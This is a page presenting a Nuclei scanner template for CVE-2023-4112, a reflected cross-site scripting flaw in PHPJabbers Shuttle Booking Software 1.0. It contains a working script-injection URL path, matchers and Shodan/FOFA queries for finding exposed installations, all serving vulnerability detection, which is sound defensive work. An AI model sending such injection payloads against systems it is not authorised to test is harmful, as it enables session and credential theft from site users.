PHPJabbers Shuttle Booking Software 1.0 - Cross Site Scripting
ID: CVE-2023-4112
Severity: medium
Author: r3Y3r53
Tags: cve2023,cve,packetstorm,xss,unauth,phpjabbers
Description
Section titled “Description”The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim’s session token or login credentials.
YAML Source
Section titled “YAML Source”id: CVE-2023-4112
info: name: PHPJabbers Shuttle Booking Software 1.0 - Cross Site Scripting author: r3Y3r53 severity: medium description: | The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials. reference: - https://www.exploitalert.com/view-details.html?id=39750 - https://cxsecurity.com/ascii/WLB-2023080012 - http://packetstormsecurity.com/files/173930/PHPJabbers-Shuttle-Booking-Software-1.0-Cross-Site-Scripting.html - https://nvd.nist.gov/vuln/detail/CVE-2023-4112 - https://vuldb.com/?ctiid.235959 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2023-4112 cwe-id: CWE-79 epss-score: 0.00229 epss-percentile: 0.61041 cpe: cpe:2.3:a:phpjabbers:shuttle_booking_software:1.0:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: phpjabbers product: shuttle_booking_software shodan-query: - html:"PHP Jabbers.com" - http.html:"php jabbers.com" fofa-query: body="php jabbers.com" tags: cve2023,cve,packetstorm,xss,unauth,phpjabbers
http: - method: GET path: - "{{BaseURL}}/index.php/gm5rj%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3Ebwude?controller=pjAdmin&action=pjActionLogin&err=1"
matchers: - type: dsl dsl: - 'contains(body, "PHPJabbers") && contains(body, "><script>alert(document.domain)</script>")' - 'contains(content_type, "text/html")' - 'status_code == 200' condition: and# digest: 490a00463044022074d15bc3667acbedc4053530f8ee716e9377efc553aae025f28b1ff0756648ec02206439901e5d45e8dcdb1e173b057ce551279ea5d7b3a607e4e0b7eae89b6b9279:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-4112.yaml"